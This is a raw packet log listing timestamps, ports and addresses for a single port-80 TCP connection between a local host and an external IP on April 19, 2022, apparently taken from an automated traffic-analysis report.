Apr 19, 2022 16:44:44.622178078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622222900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.622230053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622380972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622474909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622515917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.622570992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622611046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.622689962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622788906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622929096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.622973919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.623049974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623092890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.623171091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623291016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623409986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623456955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.623522043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623563051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.623611927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623732090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623851061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623893976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.623934031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.623971939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.624047995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.624157906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.624309063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.624353886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.624506950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.624527931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.624557018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.624630928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.624682903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.624826908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.624845028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.624984980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625030041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.625088930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625127077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.625176907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625281096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625451088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625494957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.625535011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625574112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.625650883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625730991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625904083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.625952959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.626004934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.626065969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.626113892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.626199007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.626255035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.626295090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.626604080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.626624107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.626672029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.626703024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.626746893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.627079010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627104044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627130985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627149105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627165079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.627207041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.627228975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627363920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627583027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627645016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.627662897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627707005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627711058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.627779961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627892017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.627943039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.628024101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628072023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.628142118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628333092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628377914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628431082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.628499031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628549099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.628607035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628696918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628798962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628853083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.628936052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.628983021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.629010916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629137039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629266977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629323959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.629375935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629426003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.629497051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629592896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629698038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629761934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.629858017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629928112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.629976988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.630054951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.630101919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.630158901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.630297899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.630402088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.630450010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.630537987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.630585909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.630661964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.630764961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.630858898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.630916119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.630961895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631020069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.631064892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631166935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631299973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631347895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.631421089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631469011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.631547928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631660938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631778955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631825924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.631899118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.631944895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.631989002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.632097960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.632221937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.632283926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.632328987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.632375956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.632421970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.632539988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.632699013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.632754087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.632786036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.632832050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.632901907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633018017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633138895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633192062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.633265018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633313894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.633347988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633472919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633583069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633634090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.633718014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633781910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633836031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.633941889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.633986950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.634035110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634140968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634354115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634375095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634419918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.634449959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.634500027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634620905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634671926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.634747028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634819984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634942055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.634993076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.635068893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635123014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.635143995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635262012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635380030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635432005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.635508060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635555029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.635627031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635699034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635818958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635868073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.635942936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.635998011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.636104107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.636178970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.636260033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.636312962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.636420012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.636467934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.636539936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.636660099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.636740923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.636794090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.636842012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.636888027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.636966944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637073040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637180090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637233973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.637285948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637332916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.637422085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637540102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637617111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637674093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.637753010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637861967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.637914896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.638000965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638050079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.638093948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638232946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638328075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638385057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.638442039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638489962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.638544083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638683081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638775110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638830900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.638906002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.638953924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.639003038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.639100075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.639225006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.639277935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.639332056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.639379978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.639470100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.639554024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.639663935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.639717102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.639791965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.639841080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.639940023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640019894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640129089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640177965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.640263081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640311956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.640382051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640475035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640587091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640635014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.640747070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640794992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.640863895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.640940905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641016006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641064882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.641143084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641189098 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.641259909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641402960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641539097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641590118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641590118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.641643047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.641712904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641848087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.641899109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.641943932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642057896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642208099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642260075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.642318964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642364025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.642442942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642504930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642620087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642669916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.642782927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642833948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.642860889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.642983913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643079996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643129110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.643198013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643244982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.643301964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643418074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643507957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643560886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.643681049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643728018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.643773079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643925905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.643976927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.644028902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.644144058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.644191980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.644223928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.644344091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.644541025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.644598007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.644777060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.644824028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.645035028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.645273924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.645500898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.645550013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.645781040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.645848036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.645992041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646099091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646151066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.646217108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646318913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646435022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646482944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.646538973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646584034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.646653891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646784067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646864891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.646913052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.646980047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647027016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.647095919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647216082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647337914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647384882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.647465944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647511959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.647579908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647671938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647773981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647819042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.647892952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.647937059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.648061991 CEST	80	49758	45.135.48.153	192.168.2.4
